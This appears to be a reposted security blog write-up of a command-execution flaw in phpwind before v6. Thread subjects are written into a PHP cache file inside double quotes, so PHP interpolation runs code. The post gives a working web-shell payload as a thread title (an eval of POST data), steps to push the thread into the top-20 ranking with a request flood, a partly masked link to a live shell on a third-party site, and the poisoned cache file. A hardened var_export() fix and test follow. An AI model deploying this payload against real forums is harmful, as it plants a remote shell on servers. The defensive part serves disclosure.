phpwind < v6 command execution vulnerability

    phpwind/sort.php runs once a day to rebuild the rankings of threads by view count, reply count and digest (featured) status.

    The code hands the rows fetched from the database straight to savearray(), which writes them into a PHP file. Every value savearray() emits is wrapped in double quotes, so PHP variable interpolation can be used to execute arbitrary code when that file is included.

    elseif($action=='article'){
        $cachetime=@filemtime(D_P."data/bbscache/article_sort.php");
        if(!$per || $timestamp-$cachetime>$per*3600){
            $_SORTDB=$_sort=array();
            // top threads by reply count
            $query=$db->query("SELECT t.tid,t.subject,t.replies,t.fid FROM pw_threads t LEFT JOIN pw_forums f ON t.fid=f.fid WHERE t.ifcheck='1' AND t.locked<'2' AND f.password='' AND f.allowvisit='' AND f.f_type<>'hidden' ORDER BY t.replies DESC LIMIT $cachenum");
            while($topic=$db->fetch_array($query)){
                if($topic['replies']){
                    $topic['subject']=substrs($topic['subject'],25);
                    $_sort[]=$topic;
                }
            }
            $_SORTDB['reply']=$_sort;

            // top threads by view count (hits)
            $_sort=array();
            $query=$db->query("SELECT t.tid,t.subject,t.hits,t.fid FROM pw_threads t LEFT JOIN pw_forums f ON t.fid=f.fid WHERE t.ifcheck='1' AND t.locked<'2' AND f.password='' AND f.allowvisit='' AND f.f_type<>'hidden' ORDER BY t.hits DESC LIMIT $cachenum");
            while($topic=$db->fetch_array($query)){
                if($topic['hits']){
                    $topic['subject']=substrs($topic['subject'],25);
                    $_sort[]=$topic;
                }
            }
            $_SORTDB['hit']=$_sort;

            // latest digest (featured) threads
            $_sort=array();
            $query=$db->query("SELECT t.tid,t.subject,t.digest,t.fid FROM pw_threads t LEFT JOIN pw_forums f ON t.fid=f.fid WHERE t.digest<>'0' AND t.ifcheck='1' AND t.locked<'2' AND f.password='' AND f.allowvisit='' AND f.f_type<>'hidden' ORDER BY t.lastpost DESC LIMIT $cachenum");
            while($topic=$db->fetch_array($query)){
                $topic['subject']=substrs($topic['subject'],25);
                $_sort[]=$topic;
            }
            $_SORTDB['digest']=$_sort;

            // thread subjects, taken from the database unmodified, are serialised into PHP source here
            $ARTICLEDB=savearray('_ARTICLEDB',$_SORTDB);
            writeover(D_P.'data/bbscache/article_sort.php',"<?php
    ".$ARTICLEDB.'?>');
        }


    Post a thread whose title is:

    ${@eval($_POST[x])}XXXX

    (screenshot: article_title.jpg)

    Then start a multithreaded request loop (100 threads; a few minutes is enough) that keeps requesting that thread until its view count ranks in the top 20.

    function savearray($name,$array){
        // "$$name" yields a literal $ followed by the value of $name, e.g. $_ARTICLEDB=array(
        $arraydb="$$name=array(
            ";
        foreach($array as $key=>$value){
            $arraydb.="'".$key."'=>
    array(
                ";
            foreach($value as $value1){
                $arraydb.='array(';
                foreach($value1 as $value2){
                    // each value is emitted as a double-quoted literal; addslashes() escapes quotes and backslashes
                    // but leaves $ and { alone, so a ${...} sequence in the data is interpolated when the file is included
                    $arraydb.='"'.addslashes($value2).'",';
                }
                $arraydb.="),
                ";
            }
            $arraydb.="),
            ";
        }
        $arraydb.=");
    ";
        return $arraydb;
    }


    On day two, when the ranking statistics are generated, the shell is sitting in /data/bbscache/article_sort.php.
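    The hardened replacement below is an added example, not phpwind's own code: it serialises the cache with var_export() so every value lands in a single-quoted literal, then writes a constructed sample cache to a temp file and includes it back to confirm that a title with the hostile shape survives as plain data. The names savearray_safe, cache_roundtrip_is_inert and $sortdb are assumptions of this example.

```php
<?php
// Added example, not phpwind's code: a replacement for savearray() that
// serialises the cache array with var_export(). var_export() emits
// single-quoted string literals, and single-quoted literals are never
// interpolated, so a subject such as ${@eval($_POST[x])} is written back
// as inert data. savearray_safe, cache_roundtrip_is_inert and $sortdb are
// names chosen for this example.

function savearray_safe(string $name, array $array): string {
    // var_export() escapes only ' and \ and never emits "..." literals, so
    // no ${...} or {$...} sequence in the data is evaluated when the
    // generated cache file is later include()d.
    return '$' . $name . '=' . var_export($array, true) . ";\n";
}

// Does the generated file hand the hostile subject back unchanged, as data?
function cache_roundtrip_is_inert(array $sortdb, string $subject): bool {
    $file = tempnam(sys_get_temp_dir(), 'article_sort_');
    file_put_contents($file, "<?php\n" . savearray_safe('_ARTICLEDB', $sortdb) . '?>');
    include $file;            // defines $_ARTICLEDB in this function's scope
    unlink($file);
    return isset($_ARTICLEDB) && $_ARTICLEDB['hit'][0][1] === $subject;
}

// Constructed sample shaped like the article_sort.php rows on the page:
// tid, subject, hits, fid. The subject uses the hostile title shape.
$subject = '${@eval($_POST[x])}XXXX';
$sortdb = array(
    'hit' => array(
        array('1', $subject, '11382', '2'),
        array('2', 'test',   '3235',  '2'),
    ),
);

// The original emitter: addslashes() leaves $, { and } untouched, so the
// literal it builds is "${@eval($_POST[x])}XXXX", which PHP interpolates.
echo 'vulnerable literal: "' . addslashes($subject) . '"', "\n";
// The hardened emitter: a single-quoted literal that PHP treats as text.
echo 'hardened literal:   ' . var_export($subject, true), "\n";
echo cache_roundtrip_is_inert($sortdb, $subject)
    ? "subject round-trips as inert data\n"
    : "round-trip FAILED\n";
```

    Wrapping addslashes() output in single quotes instead of double quotes would close the same hole, since single-quoted literals only honour \' and \\.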

    Live demonstration on 三个白帽 (Three White Hats): http://**.**.**.**/data/bbscache/article_sort.php

    (screenshot: article_shell.jpg)


    Proof of vulnerability:

    /data/bbscache/article_sort.php

    <?php
    $_ARTICLEDB=array(
        'reply'=>
    array(
            array("1","${@eval($_POST[x])}XXXX ..","5732","2",),
            array("10","DDDDDDDDDDDDDDDDD","20","2",),
            array("7","HI Everybody (  b)ம","8","2",),
            array("3","hello","5","2",),
            array("5","䜲⊔","3","2",),
            array("2","test","3","2",),
            array("9","AAAAAAAAAAAAA","2","2",),
            array("6","ִА⫢,"1","2",),
            array("8","�⵽բ萾ዢ,"1","2",),
            ),
        'hit'=>
    array(
            array("1","${@eval($_POST[x])}XXXX ..","11382","2",),
            array("2","test","3235","2",),
            array("3","hello","985","2",),
            array("5","䜲⊔","331","2",),
            array("7","HI Everybody (  b)ம","123","2",),


Original post: https://www.cnblogs.com/hookjoy/p/5426063.html